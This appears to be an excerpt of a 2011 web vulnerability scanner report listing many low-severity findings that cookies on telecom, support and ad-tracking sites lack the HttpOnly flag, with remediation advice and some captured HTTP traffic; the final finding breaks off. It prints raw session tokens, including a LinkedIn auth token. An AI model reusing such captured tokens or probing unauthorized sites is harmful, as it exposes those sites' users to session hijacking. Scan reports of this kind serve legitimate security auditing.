http://www.linkedin.com/companyInsider
http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html
http://www.secviz.org/node/89
http://www.westcongroup.com/
http://ad.doubleclick.net/clk
http://anpisolutions.app4.hubspot.com/salog.js.aspx
http://b.scorecardresearch.com/b
https://lnp.activationnow.com/favicon.ico
https://lnp.activationnow.com/lnp/jsp/logon/login.jsp
http://metrics.connectedplanetonline.com/b/ss/primediateleph/1/H.22.1/s8270624386612
http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294
http://metrics.vonage.com/b/ss/vonagevonagecomsubscribeprod/1/H.21/s84690568589139
http://nanpa.com/
http://nextelonline.nextel.com/tl/set_tl.html
http://pixel.quantserve.com/pixel
http://shop2.sprint.com/en/support/faq/wlnp.shtml
http://tis.org/
http://twitter.com/javascripts/blogger.js
http://twitter.com/statuses/user_timeline/secviz.json
http://www.nanpa.org/forums/external.php
http://www.nationalnanpa.com/area_code_maps/usmaps/ak.gif
http://www.nationalnanpa.com/area_code_maps/usmaps/al.gif
http://www.nationalnanpa.com/area_code_maps/usmaps/ar.gif
http://www.nationalnanpa.com/area_code_maps/usmaps/az.gif
http://www.nationalnanpa.com/area_code_maps/usmaps/ca.gif
http://www.nationalnanpa.com/area_code_maps/usmaps/co.gif
http://www.nationalnanpa.com/area_code_maps/usmaps/ct.gif
http://www.nationalnanpa.com/area_code_maps/usmaps/dc.gif
http://www.nationalnanpa.com/area_code_maps/usmaps/de.gif
http://www.nationalnanpa.com/area_code_maps/usmaps/fl.gif
http://www.nationalnanpa.com/area_code_maps/usmaps/ga.gif
http://www.nationalnanpa.com/area_code_maps/usmaps/hi.gif
http://www.nationalnanpa.com/area_code_maps/usmaps/ia.gif
http://www.nationalnanpa.com/area_code_maps/usmaps/id.gif
http://www.nationalnanpa.com/area_code_maps/usmaps/il.gif
http://www.nationalnanpa.com/area_code_maps/usmaps/in.gif
http://www.nationalnanpa.com/area_code_maps/usmaps/ks.gif
http://www.nationalnanpa.com/area_code_maps/usmaps/ky.gif
http://www.nationalnanpa.com/area_code_maps/usmaps/la.gif
http://www.nationalnanpa.com/area_code_maps/usmaps/ma.gif
http://www.nationalnanpa.com/area_code_maps/usmaps/us.gif
http://www.nationalnanpa.com/contact_us/index.html
http://www.nationalnanpa.com/content/img/cm_areaMap.jpg
http://www.nationalnanpa.com/content/img/codeMap_bg.jpg
http://www.nationalnanpa.com/content/img/fastTrack_bg.jpg
http://www.nationalnanpa.com/content/img/feedBack_bg.gif
http://www.nationalnanpa.com/content/img/hp_img_a.jpg
http://www.nationalnanpa.com/content/img/hp_img_b.jpg
http://www.nationalnanpa.com/content/img/leftNav_bg.gif
http://www.nationalnanpa.com/content/img/legal_bg.gif
http://www.nationalnanpa.com/content/img/mainbg.gif
http://www.nationalnanpa.com/content/img/nanpa_hp_logo.gif
http://www.nationalnanpa.com/content/img/nav_acMap_off.gif
http://www.nationalnanpa.com/content/img/nav_acMap_on.gif
http://www.nationalnanpa.com/content/img/nav_act_off.gif
http://www.nationalnanpa.com/content/img/nav_act_on.gif
http://www.nationalnanpa.com/content/img/nav_login_off.gif
http://www.nationalnanpa.com/content/img/nav_login_on.gif
http://www.nationalnanpa.com/content/img/nav_numRes_off.gif
http://www.nationalnanpa.com/content/img/nav_numRes_on.gif
http://www.nationalnanpa.com/content/img/nav_pub_off.gif
http://www.nationalnanpa.com/content/img/nav_pub_on.gif
http://www.nationalnanpa.com/content/img/nav_rep_off.gif
http://www.nationalnanpa.com/content/img/nav_rep_on.gif
http://www.nationalnanpa.com/content/img/nav_tools_off.gif
http://www.nationalnanpa.com/content/img/nav_tools_on.gif
http://www.nationalnanpa.com/content/img/subContent_bg.gif
http://www.nationalnanpa.com/content/js/browser_ie.js
http://www.nationalnanpa.com/content/js/dqm_loader.js
http://www.nationalnanpa.com/content/js/nanpa_nav.js
http://www.nationalnanpa.com/content/styles/nanpa_css_b.css
http://www.nationalnanpa.com/content/styles/nanpa_css_nav.css
http://www.nationalnanpa.com/content/styles/nanpa_css_p.css
http://www.nationalnanpa.com/nas/public/assigned_code_query_step1.do
http://www.nationalnanpa.com/nas/public/css/images/layout/list.gif
http://www.nationalnanpa.com/nas/public/css/neustar.css
http://www.nationalnanpa.com/nas/public/images/nanpa_hp_logo.gif
http://www.nationalnanpa.com/nas/public/images/neustar_logo.gif
http://www.nationalnanpa.com/nas/public/images/px_CCCCCC.gif
http://www.nationalnanpa.com/nas/public/js/utilities.js
http://www.vonage-forum.com/forum8.html
http://www.vonage.com/lp/US/afflpdc/
http://www.vonage.com/lp/US/afflpdc/index.php

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

13.1. https://catalyst.fastcatalog.net/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://catalyst.fastcatalog.net
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=AD971C52BCD76B2912D285BABD89388E; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.2. https://lnp.activationnow.com/lnp/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://lnp.activationnow.com
Path:	/lnp/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=1K1SNLnLjFQZhyyDNQgJVTzW15JLg5w8bm3GGTnfCV9CbzP3TmPv!1378410395; path=/
LNP=pabetaptel16p-lnp; path=/; expires=Thu, 12-May-2011 02:41:17 GMT

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.3. http://s.clickability.com/s previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://s.clickability.com
Path:	/s

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

Stats_Session=591922186.20480.0000; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /s?&7=97671&8=http%3A%2F%2Fconnectedplanetonline.com%2Fbss_oss%2Fnews%2Fpurchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422%2F&10=Purchase%20from%20Evolving%20Systems%20will%20broaden%20Neustar%20numbering%20solutions%20business&19=900&21=1&18=0.7688524462282658 HTTP/1.1
Host: s.clickability.com
Proxy-Connection: keep-alive
Referer: http://connectedplanetonline.com/bss_oss/news/purchase-from-evolving-systems-will-broaden-neustar-numbering-business-0422/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: vid=XSJJRwvp9uaycevK8bvSuzwT7PRE9+yX3HsherrzsbM=; ld=ssLQg212k+H3LqCSE0WF9IN1yHvGRQbEMl0oM8dwNE28YQc4QkM99WsCe+kR6r8AP4IQvvNXwSiIuki12HGMINSZF7h9+Dh4k1ZYz3qgr275RnUUHfhZGJr5QX4YXSlZ6KDpwnwzGoY=

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:46:47 GMT
Server: Apache
P3P: policyref="http://www.clickability.com/w3c/p3p.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 42
X-Server-Name: dv-c1-r1-u14-b11
Connection: close
Content-Type: image/gif
Set-Cookie: Stats_Session=591922186.20480.0000; path=/

GIF89a.............!.......,........@..D.;

13.4. https://support.connexon.com/custom/customimages/911_logo_trc.jpg.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://support.connexon.com
Path:	/custom/customimages/911_logo_trc.jpg.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=E67566A9FCA34838BD3C0F39C7667AF5; Path=/custom
PREV_CONTEXT_PATH=/custom; Expires=Fri, 13-May-2011 01:08:09 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.5. https://support.connexon.com/custom/customimages/Custom_HeadLogo.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://support.connexon.com
Path:	/custom/customimages/Custom_HeadLogo.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=278E65F15DE692F4A8E073513FF95433; Path=/custom
PREV_CONTEXT_PATH=/custom; Expires=Fri, 13-May-2011 01:08:09 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.6. https://support.connexon.com/custom/customimages/portal-browse-solutions.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://support.connexon.com
Path:	/custom/customimages/portal-browse-solutions.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=8B4C97B2401F7908250BAE174F9BBA38; Path=/custom
PREV_CONTEXT_PATH=/custom; Expires=Fri, 13-May-2011 01:08:09 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.7. https://support.connexon.com/custom/customimages/portal-browse-ticket.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://support.connexon.com
Path:	/custom/customimages/portal-browse-ticket.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=AD61B4917C0B442AD2D923ADADC2675A; Path=/custom
PREV_CONTEXT_PATH=/custom; Expires=Fri, 13-May-2011 01:08:09 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.8. https://support.connexon.com/images/favicon.ico previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://support.connexon.com
Path:	/images/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=607787AE9CA83B1C07389AEFC2EF256A; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.9. https://support.connexon.com/images/spacer.gif previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://support.connexon.com
Path:	/images/spacer.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=3E33D7090110A52AF1A2EDAFA1C24EAD; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.10. https://support.connexon.com/sd/SolutionsHome.sd previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://support.connexon.com
Path:	/sd/SolutionsHome.sd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=270247465902DF59F63589A1CC79528E; Path=/sd

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.11. https://support.connexon.com/style/demo.css previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://support.connexon.com
Path:	/style/demo.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=CF1B4E8028A2944A1E644EE9D78DB960; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.12. https://support.connexon.com/style/style.css previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://support.connexon.com
Path:	/style/style.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=AF295E2F29DA2AF72D8D0F33050CAE08; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.13. http://support.sprint.com/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://support.sprint.com
Path:	/support/article/Bring_your_existing_number_to_Sprint/case-wh164052-20100420-140547

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=E03DE23D7995866D54F37C7F07F26CB3.support4; Path=/
Apache=173.193.214.243.1305161164637776; path=/
RecentlyViewedArticle=case-wh164052-20100420-140547:article_text; Expires=Sat, 11-Jun-2011 00:55:43 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.14. http://www.911enable.com/business/contact_specialist.php previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.911enable.com
Path:	/business/contact_specialist.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=r2burfmm6jqje8vo1bf8orrin2; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /business/contact_specialist.php?provenance=empty HTTP/1.1
Host: www.911enable.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.911enable.com/login/index.php
Cookie: __utma=49897326.2023569351.1305162385.1305162385.1305162385.1; __utmb=49897326.5.10.1305162385; __utmc=49897326; __utmz=49897326.1305162385.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

13.15. http://www.atis.org/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.atis.org
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDASRRCDST=NDEPFBJBICBGPNEIFEPGGFBC; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.atis.org
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:03:17 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 26119
Content-Type: text/html
Set-Cookie: ASPSESSIONIDASRRCDST=NDEPFBJBICBGPNEIFEPGGFBC; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<link rel="stylesheet" href="../css/atis.css">
<meta http-equiv="Content-Type"
...[SNIP]...

13.16. http://www.commpartnersconnect.com/company previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.commpartnersconnect.com
Path:	/company

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=ff8626b16a6dd1021d5cc9da25521ffc; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /company?number=&command=AJAXlookup&f=json&format=json&jsoncallback=jsonp1305161150243 HTTP/1.1
Host: www.commpartnersconnect.com
Proxy-Connection: keep-alive
Referer: http://www.onwav.com/lnp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:50:34 GMT
Server: Apache/2.0.59 (CentOS)
X-Powered-By: PHP/5.2.2
Set-Cookie: PHPSESSID=ff8626b16a6dd1021d5cc9da25521ffc; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 89
Connection: close
Content-Type: text/html; charset=UTF-8

<p class=pageTitle style="color:red">Unable to get LNP Status - contact Commparnters.</p>

13.17. http://www.job-search-engine.com/keyword/number-portability/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.job-search-engine.com
Path:	/keyword/number-portability/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JUJUSESSIONID=b7da80c1b1571de1738a086cbc20d5e2597a6eea; Path=/
session_id=b7da80c1b1571de1738a086cbc20d5e2597a6eea; expires=Thu, 12 May 2011 01:45:54 GMT; Path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /keyword/number-portability/ HTTP/1.1
Host: www.job-search-engine.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

13.18. http://www.linkedin.com/companyInsider previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.linkedin.com
Path:	/companyInsider

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

leo_auth_token="GST:8tR8AXa_H87sybQCohL0f5rN4fe7m5AJEEzQz9agYlq3KAZCF6aP-d:1305161207:bd31acd81eafdc11524936bd768546496be4bb6b"; Version=1; Max-Age=1799; Expires=Thu, 12-May-2011 01:16:46 GMT; Path=/
s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
JSESSIONID="ajax:8157137445058115307"; Version=1; Path=/
lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

13.19. http://www.resourcenter.net/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.resourcenter.net
Path:	/Scripts/4Disapi3.dll/4DCGI/store/StoreFront.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SessionID=12387722t57wa9af1j74hos45z8o98ffd44jq45yyc2g314874sb627q4yk50a2g;Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.20. http://www.secviz.org/node/89 previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.secviz.org
Path:	/node/89

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESS511f69598f6d24673b9cd181bd44c360=3679a5a8e5f156807fb4105e9bf204df; expires=Sat, 04-Jun-2011 04:22:16 GMT; path=/; domain=.secviz.org

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.21. http://www.westcongroup.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.westcongroup.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=4BD344F3D5761EE1EA0C84F83F989EB1; Path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.westcongroup.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.redskye911.com/e911_products/e911_anywhere/hosted/purchasing/

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 01:10:25 GMT
Server: Apache/2.2.8 (EL)
Set-Cookie: JSESSIONID=4BD344F3D5761EE1EA0C84F83F989EB1; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 26571

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;
...[SNIP]...

13.22. http://ad.doubleclick.net/clk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/clk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

id=22fba3001601008d|2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; path=/; domain=.doubleclick.net; expires=Tue, 16 Apr 2013 20:37:40 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.23. http://anpisolutions.app4.hubspot.com/salog.js.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://anpisolutions.app4.hubspot.com
Path:	/salog.js.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

HUBSPOT95=185668780.0.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /salog.js.aspx HTTP/1.1
Host: anpisolutions.app4.hubspot.com
Proxy-Connection: keep-alive
Referer: http://www.anpisolutions.com/wholesale-voice-and-data-services/signaling-network-and-database-services/gateway-services/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 498
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: .ASPXANONYMOUS=V8Dkeg8vzQEkAAAAODIzNjFhODYtN2M0OS00MGY2LTkzNTItOTk2NjRmMDI4YWIy0; expires=Fri, 11-May-2012 00:46:19 GMT; path=/; HttpOnly
Set-Cookie: hubspotutk=16f8b9e2-e345-4500-a8d4-a6d152516a13; domain=anpisolutions.app4.hubspot.com; expires=Tue, 11-May-2021 05:00:00 GMT; path=/; HttpOnly
Date: Thu, 12 May 2011 00:46:19 GMT
Set-Cookie: HUBSPOT95=185668780.0.0000; path=/

var hsUse20Servers = true;
var hsDayEndsIn = 11620;
var hsWeekEndsIn = 357220;
var hsMonthEndsIn = 1739620;
var hsAnalyticsServer = "tracking.hubspot.com";
var hsTimeStamp = "2011-05-11 20:46
...[SNIP]...

13.24. http://b.scorecardresearch.com/b previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://b.scorecardresearch.com
Path:	/b

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

UID=7278cea-24.143.206.58-1297260492; expires=Sat, 11-May-2013 01:07:20 GMT; path=/; domain=.scorecardresearch.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.25. https://lnp.activationnow.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://lnp.activationnow.com
Path:	/favicon.ico

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

LNP=pabetaptel15p-lnp; path=/; expires=Thu, 12-May-2011 02:41:17 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.26. https://lnp.activationnow.com/lnp/jsp/logon/login.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://lnp.activationnow.com
Path:	/lnp/jsp/logon/login.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

LNP=pabetaptel15p-lnp; path=/; expires=Thu, 12-May-2011 02:41:17 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.27. http://metrics.connectedplanetonline.com/b/ss/primediateleph/1/H.22.1/s8270624386612 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.connectedplanetonline.com
Path:	/b/ss/primediateleph/1/H.22.1/s8270624386612

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi=[CS]v1|26E59718851D25A3-60000128800E6F4B[CE]; Expires=Tue, 10 May 2016 00:47:45 GMT; Domain=.connectedplanetonline.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.28. http://metrics.sprint.com/b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.sprint.com
Path:	/b/ss/sprintuniversalsiteprod/1/H.22.1/s83234283372294

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi=[CS]v1|26E596F005010A07-4000010D201AEE12[CE]; Expires=Tue, 10 May 2016 00:46:24 GMT; Domain=.sprint.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.29. http://metrics.vonage.com/b/ss/vonagevonagecomsubscribeprod/1/H.21/s84690568589139 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://metrics.vonage.com
Path:	/b/ss/vonagevonagecomsubscribeprod/1/H.21/s84690568589139

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

s_vi=[CS]v1|26E5977005079CA6-60000102A0076E90[CE]; Expires=Tue, 10 May 2016 00:50:40 GMT; Domain=.vonage.com; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.30. http://nanpa.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nanpa.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServernas-ns=2886707392.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: nanpa.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 00:05:16 GMT
Server: Apache
Accept-Ranges: bytes
Content-Type: text/html
Set-Cookie: BIGipServernas-ns=2886707392.20480.0000; path=/
Content-Length: 11874

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/
...[SNIP]...

13.31. http://nextelonline.nextel.com/tl/set_tl.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://nextelonline.nextel.com
Path:	/tl/set_tl.html

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTSID=3E4B9B467C31107C1E2DA15A0F0D7966; Path=/; Domain=.nextel.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.32. http://pixel.quantserve.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

d=EN8AJe8kjVmM-5GL0ZmY8frRi58oyBABxQEB3QaB1QCa0aWZVw8Ys9HNGFnDDCAJKLPR1KLMUgsqOEwdP-EQwgDB8QggINIOIAnRO7YKkZLHQxIIILsywStxxIP-FMWRtTqB4eaRAE0gDokgDDAL4tGmog0bEJ0pOUo4sjA; expires=Wed, 10-Aug-2011 00:48:44 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

13.33. http://shop2.sprint.com/en/support/faq/wlnp.shtml previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://shop2.sprint.com
Path:	/en/support/faq/wlnp.shtml

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

TLTSID=34E27AE87C31107C188CD6527E05D4BF; Path=/; Domain=.sprint.com

